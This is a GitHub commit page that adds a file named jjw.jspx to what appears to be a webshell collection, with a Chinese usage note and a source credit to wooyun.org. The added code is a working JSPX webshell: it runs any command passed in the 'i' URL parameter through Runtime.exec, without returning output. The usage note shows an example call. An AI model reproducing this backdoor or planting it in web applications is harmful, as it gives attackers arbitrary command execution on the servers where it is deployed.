Skip to content

Commit

Permalink
Create jjw.jspx
Browse files Browse the repository at this point in the history
from wooyun.org
使用说明:http://xx.xx.xx/jjw.jspx?i=ls
无回显
  • Loading branch information
tennc committed May 18, 2015
1 parent 6652171 commit 6c708c5
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions jspx/jjw.jspx
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
</jsp:root>

0 comments on commit 6c708c5

Please sign in to comment.